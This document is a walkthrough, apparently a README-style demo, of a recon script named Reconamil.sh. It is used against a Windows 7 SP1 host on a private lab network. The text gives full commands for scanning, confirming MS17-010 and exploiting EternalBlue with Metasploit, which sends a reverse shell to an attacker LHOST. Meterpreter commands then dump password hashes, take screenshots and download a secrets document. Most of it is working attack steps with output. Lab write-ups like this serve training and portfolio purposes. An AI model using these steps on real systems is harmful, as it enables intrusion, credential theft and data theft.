🔍 Reconamil.sh - Professional Recon & Exploit Demo

✅ Objective

Showcase how Reconamil.sh automates recon and helps identify vulnerabilities, leading to successful exploitation of MS17-010 (EternalBlue) on a Windows 7 SP1 system.

⚙️ Step 1: Scanning & Enumeration

Used Reconamil.sh script to scan target:

git clone https://github.com/ravisairockey/Recon-Racket
cd Recon-Racket
chmod +x Reconamil.sh
./Reconamil.sh -t 192.168.2.134 -r -p "1-65535"

Reconamil.sh performed:

• Port scanning with nmap
• Vulnerability scan: nikto, wpscan
• Subdomain & service discovery (via subfinder & amass)

Saved HTML and text reports to logs/.

📋 Scan Result Snapshot

Below is actual output captured:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 04:46 EDT
Nmap scan report for 192.168.2.134
Host is up (0.00013s latency).
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0
49152/tcp open  msrpc        Microsoft Windows RPC
...
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   message_signing: disabled (dangerous)
| smb-os-discovery:
|   OS: Windows 7 Ultimate 7601 Service Pack 1
|   Computer name: WIN-845Q99004PP
|   Workgroup: WORKGROUP

🚀 Step 2: Vulnerability Confirmation

Ran NSE script to confirm MS17-010:

nmap -p445 --script smb-vuln-ms17-010 192.168.2.134

Result: Target is vulnerable!

💥 Step 3: Exploitation (Metasploit)

Used EternalBlue exploit module:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.2.134
set LHOST 192.168.2.131
set LPORT 4444
exploit

Gained Meterpreter shell with SYSTEM privileges:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

🔑 Step 4: Post-Exploitation

• Dumped password hashes: hashdump
• Captured screenshots: screenshot
• Downloaded sensitive docs: download
• Explored processes & users

meterpreter > ps
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\Users\Administrator\Desktop\secrets.docx

📦 Tools Used

• Reconamil.sh (automates recon & scan)
• Nmap for vuln & service scan
• Metasploit Framework for exploit
• Post-exploitation: Meterpreter commands

✅ Conclusion

Demonstrated a real-world use case: how Reconamil.sh speeds up recon & scanning to find critical vulnerabilities, leading to successful exploitation and post-exploitation on Windows 7.